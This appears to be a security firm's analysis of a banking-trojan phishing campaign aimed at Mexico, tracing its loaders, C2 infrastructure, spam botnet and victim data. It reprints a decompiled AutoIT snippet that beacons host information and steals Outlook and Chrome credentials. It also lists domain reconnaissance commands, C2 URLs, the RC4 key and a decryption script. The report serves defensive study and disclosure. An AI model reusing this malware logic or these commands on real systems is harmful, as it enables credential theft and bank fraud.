At the end of May 2023, a massive phishing campaign was widely distributed, targeting both individuals and organizations based in Mexico.
The images below display examples of the phishing emails sent by the threat actors:
Each email contained a zip archive that follows the following regex pattern: FACTURA_PDF_XML_\d{6}\.zip
The actor used topics related to CFDI (an electronic invoice format mandated in Mexico) to localize the attack and deceive victims into opening the attachment, which runs the malicious file.
The attack components span multiple stages. The image below shows the steps involved in the attack:
The execution flow is complex and intricate. In the next section, we will break it down.
The phishing email’s attachment is actually a .zip archive containing a .url shortcut file. The file accesses and executes a path when run by the user:
URL=file:\\45.81.39[.][email protected]\Downloads\FACTURA_ONLINE.jse
FACTURA_ONLINE.jse presents a message box with the text:
“Este mensaje ha sido emitido por error. por favor haga caso omiso.” (English: This message has been issued in error. please ignore).
The script then sends a GET request to the following URL:
https://jogjaempatroda[.]com/redirect/inc3/ex.php?x=1
The script then tries to run the content returned from the request. If the request comes from an IP located in Mexico, the script will run a malicious code in response. This attack uses a form of geofencing, meaning that if the request comes from anywhere outside of Mexico, a legitimate website is displayed and the execution of the script terminates.
Below you can see the difference in responses to a request that originates within Mexico and to a request that comes from outside of the country:
The malicious response contains two base64 certificates which will both be decoded and saved on the victim’s computer under the following path:
%APPDATA%/lamentacao/habitarao.exe
%APPDATA%/lamentacao/escreverao.a3x
Habitarao.exe is the legitimate AutoIT3.exe that is used for execution of AutoIT compiled scripts. (.a3x) It is used to execute escreverao.a3x.
Escreverao.a3x is a compiled AutoIT script that can be decompiled using online tools such as myAut2Exe. We analyzed the script and found that it shares a similar structure with previously disclosed campaigns associated with the URSA Trojan Banker:
Global $SURLINFO = "https://jogjaempatroda.com/redirect/inc3/do/it.php"
If _ISWIN7() Then $SURLINFO = "http://jogjaempatroda.com/redirect/inc3/do/it.php"
FileDelete(@ScriptFullPath)
Local $ISADMIN = "User"
If IsAdmin() Then $ISADMIN = "Admin"
Local $SSERIAL = Hex(DriveGetSerial(@HomeDrive & "\")) & "1"
_ILNKER($SURLINFO & "?b1&v1=" & Dec(@OSLang) & "&v2=" & Dec(@KBLayout) & "&v3=&v4=" & _GETOS() & "&v5=" & $ISADMIN & "&v6=" & @OSArch & "&v7=" & AV() & "&v9=" & $SSERIAL, $SURLINFO)
_OUTRECOVERY()
_CHROMERECOVERY()
_OLISTS($SURLINFO & "?b3&v1=" & Dec(@OSLang) & "&v2=" & Dec(@KBLayout) & "&v3=&v4=" & _GETOS() & "&v5=" & $ISADMIN & "&v6=" & @OSArch & "&v7=" & AV())
The script executes three main operations:
The script creates a GET request to the URL:
https://jogjaempatroda[.]com/redirect/inc3/do/it.php
The GET request contains information added by the script:
When investigating the script, we first let it run since we did not receive the payload. This was because we sent data from a computer with an English operating system.
The values of v1 and v2 in our case were: 1033 (English – United States)
Because we knew that the campaign was intended for a Mexican audience, we changed the values of v1 and v2 to 2058 (Spanish – Mexico). We received the payload in response to our updated request. The script will later run the following payload:
https://jogjaempatroda[.]com/redirect/inc3/do/it.php?b1&v1=2058&v2=2058&v3=&v4=Windows 7&v5=User&v6=X64&v7=Microsoft Defender
The downloaded payload is saved in the same folder where the executables are located under the name h2kvs7ajf4.
The script then creates two different persistence methods:
The script then executes the downloaded payload.
In parallel to the execution of the next stage payload, the script also steals local Outlook and Chrome credentials, and it then creates a POST request to the following URLs:
https://jogjaempatroda[.]com/redirect/inc3/do/it.php?info=
https://jogjaempatroda[.]com/redirect/inc3/do/it.php?info2=
The previous script downloads a payload which is yet another compiled AutoIT script (.a3x).
After decompiling the file, we can see that the script has several operations:
Here is an example for a GET request to C&C domain:
http://miningrus1[.]click/system/?h=A1B2-C3D4\1
Below you can see the response we got upon establishing connection with one of the C&C domains:
The script checks for three possible arguments that may be in the response:
The response we got contained a .DOW argument, meaning that the script will download and execute an executable file, which is hosted on the following URL:
https://jogjaempatroda[.]com/redirect/inc4/ornot.exe
The executable (ornot.exe) executed by the script is a VisualBasic 6.0 compiled executable:
This executable is actually a dropper malware, containing embedded executable in its resource section:
The executable drops the embedded executable under the following path and immediately execute it:
%APPDATA%/Microsoft/eps2.exe
The dropped executable is also a VisualBasic 6.0 compiled executable:
The first thing we noticed while analyzing the executable is that the threat actor left the project path in the strings:
@*\AC:\Users\Alex Mason\Desktop\Loader Manipulado\Proyecto1.vbp
The path contains the string: “Loader Manipulado” (meaning: Manipulated Loader in Portuguese, which gave us the inspiration for the actor’s name).
Diving deeper into the code we found that the executable has several Anti-VM techniques, including the extraction of the computer’s BIOS version, system model, and comparing them to several versions and models that are known for being part of virtual machine environments:
The executable also compares the language of the OS with those values:
If the language of the infected computer is one of the above, the executable continues to the next anti-VM check which compares the computer name to “JOHN-PC”.
If the checks are passed the executable then moves to another function that contains a number of obfuscated strings:
After deobfuscating the strings we understood the purpose of the function:
The first part of the function looks for the current, active window title. If it contains one of the bank names (BBVA, Banorte, Citibanamex, Santander, Scotiabank) the executable downloads two executable files and saves them under the public folder.
The executable files are downloaded from the following URLs:
https://www.css-styles[.]com/media/descarga/auit
https://www.css-styles[.]com/media/descarga/btudt
Auit is the same executable as Habitarao.exe (the only difference is the version as Habitarao.exe is version 3.3.16.1 of AutoIT3.exe and Auit is version 3.3.14.5), so it serves the same purpose of executing a compiled AutoIT3 script (btudt).
The decompiled code of btudt contains two primary components:
The function J is responsible for decrypting the encrypted strings. We wrote a python script (Appendix 1) that replicates the decryption process and prints out the decrypted strings:
Based on the output we found that the strings represent an injection procedure (APIs such as WriteProcessMemory & CreateProcessW).
By dumping out the hexcoded, embedded executable and converting it to its binary format we observed that the executable is yet another VisualBasic 6.0 compiled executable:
The executable contains an embedded blob of data, encrypted using RC4 encryption. The key for the encryption is: holahola. (For decryption script see Appendix 2).
The decrypted blob of data is a VisualBasic script:
The script sends a POST request to the following URL:
https://www.aplications-update[.]com/a/b/
The request contains several parameters:
Each parameter value is encrypted using RC4 encryption and the key (holahola).
The response to the request is encrypted using the same algorithm and key; the script decrypts the response and handles the decrypted data. The decrypted data has three fields:
There are five operations that can be executed by the script:
In our case, the script downloads and executes AutoIT file, and the file is retrieved from the following URL:
https://stats.javas[.]live/media/tareas/injmx
The retrieved file is a compiled AutoIT script executable.
The AutoIT banker malware first checks if the current active window contains one of the below browsers:
The banker malware will monitor the browser activity of the user by checking the different URLs accessed by the user and compare it to the URL: “bbvanet.com[.]mx/mexiconet”.
If the user accesses the URL, a forged request will be injected to the browser and steal a local variable value that probably stores the session token of the user.
We created a fake value for the key ixd1 in the local storage of the targeted website and browsed to the website. At the same time, we monitored the network traffic and saw that a forged request was made to the C2 server that included the value of the ixd1 key alongside with the full URL path encoded in base64:
This ends the current campaign. The threat actor gains access to the user’s bank account and can extract all the information desired: account balance, recent actions taken, screenshots and more.
In this section we will disclose a number of poor OpSec (operations security) decisions made by the threat actor that led us to unraveling the real volume of the infection, the possible revenue from infections, and some of the tools the threat actor used.
Working together with @Merlax_ we found out that the C2 server had a Django REST framework hosted on it, meaning that there was open API URL that we could browse and actually see various data tables.
The names of the tables are written in Spanish. Here is the translated version of the names:
The interesting tables are “Records” and “Simple_records” (a mini version of the “Records” table). Those two tables contain the data of the infected users, including their balance, date of infection, latest transactions, and, in some cases, a screenshot of their bank account.
We also can see the total number of infections:
In this C2 server we found over 140 victim logs from the past two months alone.
We didn’t stopped there – together with @Merlax_ we found three more C2 servers that had the same pattern and open rest API access that we found in our C2 server.
By summarizing all the data we could harvest from those C2 servers, we managed to find over 4K victims in total with a possible revenue of $55 million (please note: this calculation is based on the balance amount at the time of infection). The earliest sign of infection we could trace back was about a year ago.
We found a panel login page that was seen in all four C2 servers that hasn’t been previously disclosed anywhere:
Working together with @1ZRR4H, we identified a web panel hosted on several domains presented in the execution flow (miningrus1[.]click and moscow12[.]at):
The panel is used for distributing emails. The actor can modify the sender name, subject, content of the mail, and through which SMTPs the mails will be sent. The actual spamming is done by a botnet. (The spamming payload is explained later).
Both domains are being resolved to the IP: 194.180.48[.]54
While investigating miningrus1[.]click we found a urlscan.io scan that fetched a payload from the domain. Naturally, we started to investigate the payload.
Ascan is written in .NET and serves the purpose of brute forcing SMTP servers with poor credentials.
Ascan generates a random IP address, and will check if it has open SMTP (port 587). Upon a successful hit, the program will start by trying sending a test mail without the validating any authentication (the program will use the username: nouth and a blank password) but if it fails the program begins to iterate through a dictionary of usernames and passwords for the possibility of hitting a poor credentials setup.
The test mail is sent over to “[email protected]” with the display name “Rose Amag3”
In other samples of the Ascan we found two other recipient mailboxes:
We searched for mailboxes on this relay attempts page, created by researcher Alexey Shpakovsky, and found many attempts for SMTP relay attack. The interesting part here was that most of the IPs which conducted the attacks came from private IP addresses located primarily in Mexico. This led us to the conclusion that upon a successful infection, Ascan (and all the following tools) are downloaded and stored on the victim’s computer as part of a persistence.
We observed additional campaigns conducted by the same threat actor which installed malicious browser extensions on the victim’s Google Chrome or Microsoft Edge browser.
The distributed executables contained base64 encoded strings, which, when decoded, reveal the content of the malicious extension:
The extension name was set to “Chrome Notification” to try and manipulate the users to not delete the extension if they notice it.
The extension monitors the current site visited by the user. If the site is one of the targeted sites by the extension, it will redirect the user to a phishing site that impersonates the targeted bank.
Below is a list of the targeted banking sites and phishing sites observed during our analysis:
In certain cases, the actor drops (probably on a high value target) the NetInfo executable. This is a simple reconnaissance tool to gather information about the user’s possible domain.
The commands below are executed:
net group \"Domain Admins\" /domain
net group \"domain computers\" /domain
nltest /domain_trusts /all_trusts
nltest /domain_trusts
net view /all
After the commands are executed, a concatenated string (which contains the response of each executed command) is sent via a POST request to one of the actor’s domains.
Spmr.exe is the spamming tool used by the actor to conduct the phishing campaign.
It uses the infected machines as spamming stations to send out phishing emails.
The tool starts by fetching the campaign configuration information using a GET request to a hardcoded C&C URL.
The URL may have three possible responses:
The configuration data itself is hosted on another URL which is built as an XML document and has nine data fields which are base64 encoded. The tool decodes those values and uses them for establishing the spamming campaign.
The fields are:
The tool then proceeds with conducting the spamming campaign by relying on SMTP found previously (by the Ascan tool) and sending it out to the spam list.
Files –
IPs –
Domains –
SMTP relays recipients –
strings = ['UHAIRISHOJEJBJFIIJEGUJCIKIHJDILFPFKIHJJJDILIAFKFHFOFHGUIOIUIGJCJIHIIKIUFPFMIHGUIOIUIGJCJIFRFHFOFHFKICFKFQ', 'JPKRGQKRBPKJHJIPIPIODQERJQAMBRARDRCJHODPKRDPKRCRFQAPJMCQKRERBJIMKQARCQGRDQKQKMCQKRERBJIOEQERDQHPKMCPJRHQJRCPJJIOIMCPJRHQJRCPJJIOJMCPJRHQJRCPJJIOIOEQDRKPKMCPJRHQJRCPJJIOJOEQDRKPKMCPJRHQJRCPJJIOIMKQJRFQIREMJQDPGRCRCMCPJRHQJRCPJJIOJMKQJRFQIREMJQDPGRCRCMCPJRHQJRCPJJINBQEQGQHMHRERDRCQDPIREREPKMCPJRHQJRCPJJINBQHPGQCRCMCRGQKRBPKJHOEQCQKRGOIQDQJPJQKRGMCRGQKRBPKJHODPKRDPKRCRFQAPJLEMBRARDRCJHODPKRDPKRCRFQAPJLEMBRARDRCJHQDODREPJNFQIRAREREMBRARDRCJHQDODREPJOAREREQKRFRDMCQKRERBJIQCOERDPKNARCRBQKRB', 'OMAMDMCGPKAMBLPLCLFMCMDIKMAMDMCGPKELHMCLELBLDILLDMHLOMCLDHAJPMCLOLDLEMDMCJJLDILLDMHLOMCLDHAKDLIMBLFLALEJILE', 'SHLJRJFJAKAJEIEJRJPJCJFJSJTIK', 'NKJMMMKLMMAMNMO', 'OKELHMCLELBLD', '[GYHOHHHJGYELFTHGHGHLGZHPHMFVHEGUG\HKFLGXHPHGHKGXEMFTHKE\FLELGYHOHHHJGYELFUHJFBFKEMGXHPHGHKGXEMFTHKFBFLELGYHOHHHJGYELFUHJFDFKEMGXHPHGHKGXEMFTHKFFFLELGYHOHHHJGYELFUHJFHFKGYHOHHHJGYELFTHGHGHLHKHGHEGKHHHJGYFKEMGXHPHGHKGXEMGGHMGUHMHMHLGKHHHJGYFKEMGXHPHGHKGXEMGHGVG[GLHGHKGXFLELGYHOHHHJGYELFVHJHKHGHKGCG[GZHLGYHMFKEMGXHPHGHKGXEMFUHKHJHHHJGHGYHEGYGXHLHHHJFLELGYHOHHHJGYELFUGUHMGUGDGZG[HKGZHLFLELGYHOHHHJGYELFUGUHMGUGHGYHEGYGXHLHHHJFLELGWHQHMGYEMGFGZG[HBHKHMGYHKFQHKGYGVGOFIE\GRFKEMGXHPHGHKGXEMFSHKE\GCHHHQGGHMGUHMGYFLGXHPHGHKGXEMGGGZG[FXHKFLELGYHOHHHJGYELGHGYG\FVHLFKEMGXHPHGHKGXEMGGGZG[FVHKFLELGYHOHHHJGYELGHGYG\FTHLFKGYHOHHHJGYELFVGXHBFKEMGXHPHGHKGXEMFUHLHAFLELGYHOHHHJGYELFVGVHQFKEMGXHPHGHKGXEMFUGYHPFLELGYHOHHHJGYELFVGWHQFKEMGXHPHGHKGXEMFUGVHPFLGXHPHGHKGXEMFUGWHHFLELGYHOHHHJGYELFVHAHIFKEMGXHPHGHKGXEMGGGZG[FTHKFLELGYHOHHHJGYELFVFVHEGUG\HKFLELGYHOHHHJGYELFVHKHIFKEMGXHPHGHKGXEMGGGZG[GHHKFLGVHRHLGZELFVHPHMGYHGGXGZGXGGGYG\HAHLHLGZHJHLGOFFFAFCGQ', 'KOHOLOFPJJAMIOFOKPBOGNLKFOBLCQDPGPKOHJALJQFPLOJPKMLPFMIOEPLPLNAOEOLOILDQCPHPJOIILNAOEOLOIPLLCQDPGPKOHJANBOJPDPHOGOFPLPBPGPGPKLDQCPHPJOIILNDPAQGOIPHOJMEOIOFOHOJPJLDQCPHPJOIILMJPAPGPAPFQAPFMAQEPLPKOELDQCPHPJOIILMJOEQEPAPFQAPFMAQEPLPKOELDQCPHPJOIILNDNCLDQCPHPJOIILNDMLLDQCPHPJOIILLLOLOJOGPDPKQBPELDQCPHPJOIILMFMLLDQCPHPJOIILLLNCLDQCPHPJOIILNCOIPEPGOHOEQAPAPHPFLDQCPHPJOIILMLQBOJPJPEOEQFLCOHOLOFPJJANBOJPKOJPJQCOIOINKLAOALDQCPHPJOIILMLMAMJMEOIOIPGPLPBOJPBOIPKLCQDPGPKOHJAMKMBMIMFPFOKPGPKPEOFPLPBPGPGLCOHOLOFPJJANBOJPKOJPJQCOIOIKFNLKFKEOALDOHQDPGPKOHJALIOIOHPKOIPLPKMLOJMKOIQDMAQEOIMEOIOFOHOJPJ', 'ZHVHMHQHBEPGFG[HAHGHGHMHCFPHUHNHPHCEOGHHSHLG[HDHPGIHDGMHCHBHRHHHMHMHQFPHBHVHMHQHBEPGMHHHKHDFXG[HRHDGLHSGZHLHNFPHBHVHMHQHBEPGIHNHGHMHRHDHPGNHMGMHWHLG[HNHJGNGZHAHJHDFOHCHUHNHPHCEOGHHSHLG[HDHPGIHDGMHWHLG[HNHJHRFOHVHMHQHBEPGLHHHXHDGHHEGHHOHRHHHMHMGZHKGAHDGZHCHCHQFOHVHMHQHBEPFWHGGZHQGZHBHRHDHPHHHQHSHGHBHQ', 'PLNLELIKKGLJEKIKNKQKJIEKILPLJKMGKJFKHLALELIJDKQLDLBKLLIJNKMLHLJKPLFLDIEKILPLJKMGKJFKPLELELIJDKQLDLBKLLIJNKMLHLJKPLFLDIEKKLNLELIKKGLJKKQLPKMJGKNILLFKKKMIDKLLMLFLHKLGKJLKPLQKLJHKMJBLDKQLJKQKHLCKPLQKLKLIMKILJKIIDKLLMLFLHKLGKJLKPLQKLJHKMJNLDKQLDKQLJKQKHLCKPLQKLKLIMKILJKIIDKLLMLFLHKLGKIKKKKLLHKMLILJJGKNINLELJLILOJILEKQLDLKIDKLLMLFLHKLGKILKHLJKLJHKMIMLEKLKLIEKKLNLELIKKGLIKKILIKMJGKNIMKILJKIIDKLLMLFLHKLGKJBLCKIKNKMIKKILIKMIDKLLMLFLHKLGKJLKLKKLJKQLELEIJLCKPKOLDLDKLLELJIEKKLNLELIKKGLIOKQLBKMIJLCKPKOLDLDKLLELJIELMLFLHKLGKJFKHLALELIJGLGKLLIKHLKKPLEKNJLLOLJLJKMLCJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJHLFKMLHKILJKQLDKOJKLPLILKKLLDJNKMLHLJKPLFLDIELMLFLHKLGKJFKHLALELIJALDKHKOKLJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJBLCKIKNKMJNKMLHLJKPLFLDIELMLFLHKLGKJFKHLALELIJKLLKILJLOLJLJKMLCJOKLLILIKQLELEIDLNLELIKKGLJEKQLDLFLHJLLKKJLILPLILKKLLDJNKMLHLJKPLFLDIEKKLNLELIKKGLJOKQLDHNHLJOKLLILIKQLELEJNKILBLLKLIEKKLNLELIKKGLJKKQLPKMJGKNJALDKHKOKLIEKKLNLELIKKGLJKKQLPKMJGKNIQKMKHKLKLLILIIEKKLNLELIKKGLILKPKLKKLAJLLKLDIDLNLELIKKGLJKLLKILJLOLJLJKMLCIELMLFLHKLGKINLBLCILKPKHLIKHKKLJKMLHKQLILKKPKKLIIEKKLNLELIKKGLJKKQLPKMJGKNJKLKKHKKLAJKKLLJKLLILLKMIDKLLMLFLHKLGKJLKPLQKLJHKMJLLJKIKJLBILLFLCLDKPLKIDKLLMLFLHKLGKJLKPLQKLJHKMJAKLKILFJKKLLJKLLILLKMIDKLLMLFLHKLGKJLKPLQKLJHKMJAKLKILFIMLELDLCKQLJIEKKLNLELIKKGLJDLFKHKLKLLIIOLCKHKOLIIEKKLNLELIKKGLJFLLLCKJKLLIJGKNJJLMKHIKLDKLJKKQLPKMLI', 'XGHHVHWGVIFICIGHMIFGJHPIEGHHKIFHKFEEYIFGLGQGDGKGHHJGRGTGWGMGRGRGDGPHIGLGHGEGGGIGUFIEUHUFDEXHBGKGHGLGQGLGRGMGFGLGSGMGGGMGHGKGUGLGTGKGKGLHCGMGHGMGGGMGMGKGWGLHCGLGWGLHBGMGIEXFEFF', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOIHHJHJHKHCHKHUHJIFHJHFHJIGHIIFHJIFHJICHJIEHJIGHKHLHKHNFOFUGA', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOIGHJHEHKHMHJIHHKHGHKHFHIICHJIHHKHSHKHFFOFUGA', 'THGJDJEHUJMJJJNIPJMHIISJLHGINJMINFUFPJMHKHPHCHJHGIMHQHSIAHLHQHQHCHOILHKHGHDHFHHHTGDFLJCFTFOHPHNHOHPHFHQHIHOHQHNHKHPHCHNHEHPHJHOHNHPHDHPHCFOFUGA', 'JPJQCPHRBJINJPHQHQAPALKPCMCPJRHQJRCPJJIOFQJQDQKQIOAQAOHQDRCRDRFPGQHODQERJQAMHQJPJOBQCRJRCQEPIPHQGMIPJPKRBQARCRDMBPKRGQKRBPKJHOHQDRCRDRFPGQHMHPKPJRCPKRDRCMCPJRHQJRCPJJIODQERJQANKQBOCPHRGNAPGREPGMCPJRHQJRCPJJIOAQKQDQJRDQARBOFQJODPGRHMKPHRDPHMBPKRGQKRBPKJHOBQJQEQIREPKRCOEQKOCQAQGQKPIPHRDQEQJQJRCMCPJRHQJRCPJJIOAQKQDQJRDQARBOFQJNIQDQJPKQJREQIPHQARBRDMBRHQJRCPJJINJRFQHPIPKRCNKQBOCQAQGQKPIPHRDQEQJQJRCMCRGQKRBPKJHNKREQIPHQARBOAQANIQDQJPKQJREQIPHQARBRDMBPKRGQKRBPKJHMKQCPHRBPHPIREPKRCQDRDRDQEPIRD', 'JPIRIREPKJINEQJQCQARBQERDQAPJMIPJPKRBQARCRDODRAPGPJPKMCPHRJRDQAJHODPKPHPJNFQHPHQBQANBQEQGQANARIPKPJNKRARDQEQJQJRCMCPHRJRDQAJHMJPKQEQIQCMKQAPHRFQBQCPKPKMBPIRIREPKJIODRAPGRCPKMCQKRERBJINIRFRDPHQIREMBRARDRCJHNFQHPHQBQAMIPHRCQAMHPKPJRCPKRDRCMCQKRERBJINHQKPGPKPKRCMKPHRDPHMBRARDRCJHOBRBQKPIQARCRDOAPHRBPHQHQARDQARBRDMBRARDRCJHOEREPIODRJRCREPKQIMKPHRDPHMBRARDRCJHOBRBQKPIQARCRDNDQAPGRAMBRARDRCJHNCPGRDRDOBPKPINHQKPIQGMBRARDRCJHNCPGRDRDOBPKPINHQKPIQGOCQKREREQDQJPKMCQKRERBJINBPHRCREOAQAPHOGQIQHQJPJQFODQJRFRDQEQIQAMBPKRGQKRBPKJHNBQIRGQDRCQJQJQHQAQIREOFRAPJPHRDQAMJQKREQJRDMCQKRERBJINGQARBQJPKQHMJPHQGQHPHPHPIQGOEPHPHQHPKMCQKRERBJINARGPKQJRDNIQJQCODQAPIREQDQKQIMCQKRERBJINARGPKQJRDNIQJQCMBRARDRCJHNCRBQAPKNIQDRDRDMCPJRHQJRCPJJIOEQHRCNBRHRAPGQJRCQEQJQJMJQKREQJRDQARBMCQKRERBJIOEQHRCMJQDREQHPHQKMCPJRHQJRCPJJIOEQHRCMJQDREQHPHQKMJQDRERCPBLDPDMBRARDRCJHODPKPHPJOAQIQHRIOEQCPHRBQAPJNJPKQIQJRCRIMJPGRDPKMCQKRERBJIOCQAPGPKNKQJQGRJODQDPGRCPKPKNIQAQHQKRBRJNDQAPGRAMBRARDRCJHODPKPHPJOAQIQHRIOERDPHRDQEPIOEPKRCRFQARBNAPGREPGMCQKRERBJIMHQJRCQEMJQKPJQAOAPHQBQAMKPHRDPHMBRARDRCJHOAPKQIMJQKPJQAOAPHQBQAMKPHRDPHMBRARDRCJHOGQIQEPIQKPJQAMJPHRCQAOEPHPHQHPKNAPGREPGMCPJRHQJRCPJJINJRFQHPIPKRCNKQBOARCQJPJPKRDRCQKRBRDMBPKRGQKRBPKJHNKRDNDQGQKPHPHQGNCQGPHQBMCPHRJRDQAJHOEQKPHRBQALDPBLFPDMBQEQIRELHLGJHMKRBQERDQEPIPHQGOEPKPJRDQEQJQJOEQEQHQAQJRFRDMCPJRHQJRCPJJINDQAPGRAODQAQBQIPKQJRDODPKRDPKRCRFQAMBPKRGQKRBPKJHNEPKPHQKOEPKQCQHQAQIREMJQKQHQIQDREMBPKRGQKRBPKJHNEPKPHQKNAPKMKQJQIQHQERDOFQJREPGQHNBRCPKQAOEQDRBQARCQDQJQHPJMCPJRHQJRCPJJINDQAPGRAMKQAMJQKQHQIQDRENBRCPKQAMIQHQJPJQFOFQCRCPKRDQCQKQGPKMBPKRGQKRBPKJHNKREQIPHQARBOAQANEPKPHQKRDMBPKRGQKRBPKJHNJPGRIQDQIREQINJRFQHPIPKRCNKQBNDQAPGRARCMCQKRERBJIOARCQJPJPKRDRCNEPKPHQKRDMBRARDRCJHNDPJQEODQDPGRCPKPKNDPHQIPKQGQAOEPHPHQHPKMCQKRERBJIOARCQJPJPKRDRCOERDPHRBREPKRCNDQAQGRAPKRCMBRARDRCJHNDPJQEMKMKMHRERDRCQDPIREREPKNIQDRDRDMCQKRERBJINHQKPGPKPKRCNHQKPIQGMBPKRGQKRBPKJHOAODNJPGQFQJRCOGQARBRDQDQKQIMCPJRHQJRCPJJINKOENIQEQIQKRBOHPKRCRCQEQJQJMBPKRGQKRBPKJHOAODMJREQEQGPKNJRFQHPIPKRCMBPKRGQKRBPKJHOAODOBQGPHRDQBQJRCQHNFPJMCPJRHQJRCPJJINEQIPGQCPKOEREPIODRJRCREPKQIMBPKRGQKRBPKJHNFQHPHQBQAODRFPHOERIRDRDQAQHNJPGQFQJRCOGQARBRDQDQKQIMCPJRHQJRCPJJINEQIPGQCPKOEREPIODRJRCREPKQINIQEQIQKRBOHPKRCRCQEQJQJMBPKRGQKRBPKJHNDPJQENDPHQIPKQGQAMIRFQAQBPKRCPALFLFPDMBPKRGQKRBPKJHOBQJRDRDOBRBQKPIQARCRDNEQJQDREOCQKREREQDQJPKMCPJRHQJRCPJJIOEQHRCNBRHRAPGQJRCQEQJQJMIQERDQIPGRAMBPIRIREPKJIOEQHRCNBRHRAPGQJRCQEQJQJMIQERDQIPGRAMIQERDRDPALDLDLKPCMCPJRHQJRCPJJIODQARCRDQDQKQINFPJ', 'SHRJMJBJGJFHJJBJSJFHIJEJDJSJEJTJS', 'WHHIJIBILHVGXIKIGHTHUILIKGVHUIFIGIKIQ', 'ZHJHCHQHLHDHJFHFFFCHBHKHJ', 'XHMHYIAHV', 'YGSHIHWHQHNHRHFHXHJGNHWHSHHHIHXHW', 'UIOIGIUIJISIK', 'VIDIVIOIQID', 'TJGJLIRJDJEGEIRJDJE','XGEHNHOICHPIDIEGRHQGHHYIEIDIJGTHYHTHXIF','[GHHAHSGYGDGZFYGYGVGXGZHJHL', 'ZGCHKG[HEHDFVG[HQHD', 'NKMMDNGLOKIMAKCMHLLMBMA']
def decryptString(encString):
decString = ''
key = ord(encString[0])
itr = 1
for x in range(1,len(encString) - 1, 2):
val1 = ord(encString[x]) - 65
val2 = ord(encString[x + 1]) - 65
decString += chr((val1 * (key - 63) + val2 - key) - (itr % 2))
itr += 1
print(f'{decString}\n')
for string in strings:
decryptString(string)
data = "1105EA690127CD7D2225B9D2DE8EBAEB1FAB2E81D87F3A83D8610FC7D03279B2BE41C3443F24823822ABF523F108B19212748D73CBE006C2493CF36670B6501F2C662ED961F39BBD4DC4B451810F99D9680C2C22448F69DF22C06BB2DD2BDB64A5E4CDF45005AB29BF115F18B73474AC12D5370B64C82233EFB185FAC0C4E2B460F79129D334B92D4D3332AAD38C932781BD00853DDCB13AE4578734BE7E4765784098C86DBC4DA175A6471CC47DC251601F6E762752FC84745B3C7EA26E57CBC1CAAD4EE1E59F59BCF0134964B80329E65A48FEAFF44E2F12E09B4172D2D5D960F0CA8EE0FEC53EC919BA0E244D45F5B9818C9A0E09CF34518898448792627B7C5E4F817E0D68758A0CFAD5A14DAC93C74EAD40AAC20569F557B0809E4CBD7770276F6FEDD051F7D494ADC37A2E2ED8A378BFD04FE2F6A0CCF424F2AA7F55B3B9802A18EE60C5396A5858F71D458EFCD5FB0C1E8FDA3B8345A2F79C25F6C4EFFA5139903F69AFBCB032D61D5F2EBDDBC3482E949F44A05B3CDCDE78D0D9BCCA7D801F4C20A62BB77B4E10DA52AA502B4EFBA0D4C47490E111C47C72B8B808A4B9E754F72B26A9349F7AD037DE2850F926EDD8F4A215EDA2A8545A6A648FF10F20505238C8F6A3A3FBBA7C6A2538213FDF7802E647EA16DB728E76F0C3F643FC4F6A8B2C66EC151F72CBB5C44FEB3FB47CF603B520DC3D15C6241CDFB66C7E6885BF7E39BA135A24D5B9012433275BE6C5AA8BFD827BB7407B5F6456D89C2905778B8373F25595D22023A7F0357EA511E7834953220B8062C2A58BFDF6A78ED94E357527BDA3B1B6691F3A282043407D9FC369407A50B80DDFB7BF4BC2128ECF5567B98FCA0806A9E4CD4AD424786C4D4D682EC75AE0BCD90A70B7BF748629678F70BE071F1759142D157C2D90C8B551C9E6218EDC448521980D4465FDCCCDBF04FB47C00EEC34AB88CB17D2BC2FB3B57130123DFF077E56D33EA31531E3582FCEA7F87E8C2709BE1ECBF3A0F6B18F9D6E582D19EFDE8FC155B28F1DA4F33E3A288A95D129CFAECC0554C7B87C85D85C3117AEE33DA3710CB031CB5966234A99A4A54E81585C6E0A0FEBECDA54A510F46F38FDCC0AF498D342804DC045232E29F3CE17E00745B46E86596C6DCA13A51C91857D5EEA0E717BB608E208613A63699D3869F256120ECB2F93B9D2CEA1660417D51177D3831814E7D50644EA85AE99792BA2D41B63DAF1B1CA719893902CE6338A87CE097EFA22C07EA0F6CD322D545D69FC5849D0E43807B181082E90E535AFB0519C054813493AA5A85180BBDE80AE7EF99208416EE8A87D436D9806B16545CC29E5B01119444B894CD066973A8EE82C757DA346D6068F61AB177866EA926244540D0CEA6DA4A438D61893F6731313E83C06BE5EC8BCA103F990013BFFC0D50C309D63B586FA4810FBFE49D5AD8145AF6C62C3334192E4565CA7A28743729E1914BE9BB5C95A225DB05547C1649A3D9B51687E97DD3CFD0551A2F4828D33C8336C2F6509256505CF8FEE34642A1039070AD95607CCF3C8E3D9B1E9612DADD0CDE396F0A07ECB96B96A5327F619E40006F363BC4FE31C220A51DB1B56B8D8F7C36220B58DF75EA1011AE78E352A6AB47BE5BBBECED2C4A87D552CDF288E7233B41C148F5964035EB140160D02A300FC256F1360DDCF7172255CDE52BA64E6930233BBB8352449B89FAD23010DF00AE458BE284804CEFC4591B228B2EEB6E572CEA847CF0D1D7C58E04038D0088CBF3E3A4A83F345CBC9E5C2CE106165602C2F0A51804DB4C01EBBB18907F1B04AF23A8868FEF3D0A0C096AF442D2E4A5233A1A6532CC9059915D567CFEFB7ABA26965FF88F9E77497E556C267EC4A159416DEEDC817D6D863958E4EA6EF4B5C5A8A10C26C0261553260B98EC203F23D01F5B0009B3B5A50A460E2A6579E23377950987BDF9B5C71E18790F3F24F994B0DA9C9756EE6427D833E0184932EB0AB509A9379B17EB90942C020B99088D2C899CDA5B4D232D93820928E970FC3D45911815E94542423A8534A29E20E86C230EBF65EAC8815CD4C71C69E57C41C8AF42CA136036AEBC137C6187ECE1CCA410A982BB16611EB9D1AB906C37862F0D4C9D20CEDA4E534B58B83026CD087A373BBEF5B20C5213800E11126A503682DEF80748A4F096465F78E8FC174F9CE053454EB383F1B4B3CA0578D59E0EDADCB3E8D09B966A1A61D67301390830E727FE6A86D616D99FE916C26AF22DB55CE32CC2E5985EF3543582CC9CFBABA3CE12F6BB9D5F68E03F6E476842A43DD4E5C08AEB27FCAAFA7BC4E6DF674F7A2E4F1636886D11DF4E0EA9BA640E090547B451A848AD9DBE2AC66407ED4012F31A0F99252